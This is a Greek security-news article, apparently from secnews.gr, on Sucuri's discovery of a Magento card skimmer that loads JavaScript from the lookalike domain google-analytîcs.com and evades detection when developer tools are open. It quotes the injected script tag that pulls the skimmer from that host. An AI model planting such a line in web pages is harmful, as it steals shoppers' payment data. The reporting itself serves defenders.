Παρασκευή, 22 Ιανουαρίου, 03:11
Αρχική security Κακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

Κακόβουλα Google domains χρησιμοποιούνται σε card skimmer επιθέσεις

skimmer Οι εγκληματίες του κυβερνοχώρου βρήκαν ένα νέο τρόπο να κλέψουν χρήματα από χρήστες, που κάνουν online συναλλαγές. Οι hackers χρησιμοποιούν ψεύτικα domains, τα οποία υποτίθεται ότι είναι της Google, και οδηγούν τους χρήστες σε παραβιασμένα sites. Βλέποντας το domain, οι χρήστες νομίζουν ότι το site είναι ασφαλές. Κάποιοι ερευνητές από την εταιρεία Sucuri ήρθαν σε επικοινωνία με έναν ιδιοκτήτη ενός Magento website, και ενημερώθηκαν ότι ένα domain είχε μολυνθεί με ένα skimmer πιστωτικών καρτών. Το skimmer χρησιμοποιεί κώδικα JavaScript, που περιέχει έναν σύνδεσμο με την κακόβουλη διεύθυνση google-analytîcs [.] Com.

Ακολουθεί ένα παράδειγμα του κακόβουλου κώδικα:

<script type = “text / javascript” src = “//google-analytîcs.com/www.[redacted]/3f5cf4657d5d9.js”> </ script>

Οι ερευνητές είπαν ότι οι hackers χρησιμοποιούν αξιόπιστα ονόματα, όπως η Google, και έτσι οι επισκέπτες νομίζουν ότι τα sites είναι ασφαλή. Δεν προσέχουν, όμως, ότι υπάρχει μια διαφοροποίηση στο domain, που υποδεικνύει ότι πρόκειται για κακόβουλο site.

Οι ερευνητές ανακάλυψαν ότι το συγκεκριμένο skimmer είναι παρόμοιο με άλλα που κυκλοφορούν και αποθηκεύει δεδομένα, που εισάγονται, καθώς και drop-down menu επιλογές.

Ωστόσο, το skimmer ελέγχει αν χρησιμοποιούνται developer tools είτε στο Google Chrome είτε στο Mozilla Firefox. Στην περίπτωση που χρησιμοποιούνται, δεν θα επιχειρήσει να κλέψει οποιαδήποτε πληροφορία για να αποφύγει την ανίχνευση.

Αν δεν εντοπιστούν developer tools, κλέβει πληροφορίες και τις στέλνει σε έναν απομακρυσμένο server.

Τα card skimmers εγκαθίστανται μέσω ευάλωτων sites ηλεκτρονικού εμπορίου και αποτελούν ένα σοβαρό και συχνό πρόβλημα. Τον Ιούλιο, η εταιρεία λογισμικού RiskIQ δήλωσε ότι μια πρόσφατη εκστρατεία κατάφερε να μολύνει πάνω από 17.000 websites με card-skimming malware μέσα σε λίγους μόνο μήνες.

Οι χρήστες του Magento, όπως και του WordPress και του Drupal πρέπει να ενημερώνουν συνεχώς τα λογισμικά τους. Τα Magento domains αποτελούν στόχο των hackers, που προσπαθούν να κλέψουν οικονομικά δεδομένα. Μια έκθεση έδειξε ότι το 2018, το 83% των Magento websites βρέθηκαν να είναι ευάλωτα στα card skimmers.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

LIVE NEWS

Mac: Πώς να δείτε ποιο μοντέλο έχετε και πότε κυκλοφόρησε

Όταν χρειάζεστε υποστήριξη για το Mac σας - ή θέλετε να εγκαταστήσετε κάποιο είδος αναβάθμισης - συνήθως πρέπει να γνωρίζετε το ακριβές...
00:02:35

Bill Gates: Θα συνεργαστεί με τον Biden για COVID-19 / κλιματική αλλαγή;

Ο συνιδρυτής της Microsoft, Bill Gates, ανέφερε στο Twitter ότι ανυπομονεί να συνεργαστεί με το νέο Αμερικανό Πρόεδρο, Joe Biden, και την...

Ποιες είναι οι φήμες που κυκλοφορούν για το iPhone 13;

Το iPhone 13 της Apple θα διαθέτει ένα επανασχεδιασμένο σύστημα Face ID που θα διαθέτει μικρότερη εγκοπή στο πάνω μέρος της οθόνης,...

Biden: Πώς αποτυπώθηκε στα social media η πολιτική μετάβαση στις ΗΠΑ;

Καθώς ο Joe Biden ορκίστηκε Πρόεδρος των ΗΠΑ, αυτή η σημαντική πολιτική μετάβαση αποτυπώθηκε και στα δημοφιλή social media. Στις 20 Ιανουαρίου,...

Το CentOS σταματά να υποστηρίζεται αλλά το RHEL προσφέρεται δωρεάν

Τον περασμένο μήνα, η Red Hat προκάλεσε μεγάλη ανησυχία στον κόσμο του Linux όταν ανακοίνωσε τη διακοπή του CentOS Linux.

Διέρρευσαν online Microsoft Office 365 κωδικοί πρόσβασης υπαλλήλων!

Μια νέα καμπάνια phishing μεγάλης κλίμακας που στοχεύει παγκόσμιους οργανισμούς βρέθηκε να παρακάμπτει το Microsoft Office 365 Advanced Threat Protection (ATP) και...

COSMOTE και Microsoft παρέχουν νέες λύσεις cloud για επιχειρήσεις

Η COSMOTE και η Microsoft επεκτείνουν τη συνεργασία τους, προσφέροντας ακόμη πιο εξελιγμένες και υψηλής ποιότητας λύσεις cloud, σε μεγάλες και μικρομεσαίες...

Οι κυβερνοεπιθέσεις στην Ανατολική Ευρώπη αυξάνονται!

Οι κυβερνοεπιθέσεις που πραγματοποιούνται σε πολλές κυβερνητικές υπηρεσίες και εταιρείες των ΗΠΑ τους τελευταίους μήνες έχουν προκαλέσει ανησυχία στις αναπτυσσόμενες χώρες της...

Η Tesla μειώνει τις τιμές του Model 3 στην Ευρώπη

Η Tesla έχει μειώσει τις τιμές του Model 3 σε πολλές ευρωπαϊκές αγορές, οι οποίες μειώσεις θα μπορούσαν εν μέρει να συνδεθούν...

iOS, Android, XBox χρήστες στο στόχαστρο νέας malvertising εκστρατείας

Πρόσφατα ανακαλύφθηκε μια νέα malvertising εκστρατεία που στοχεύει χρήστες κινητών και άλλων συνδεδεμένων συσκευών και χρησιμοποιεί αποτελεσματικές...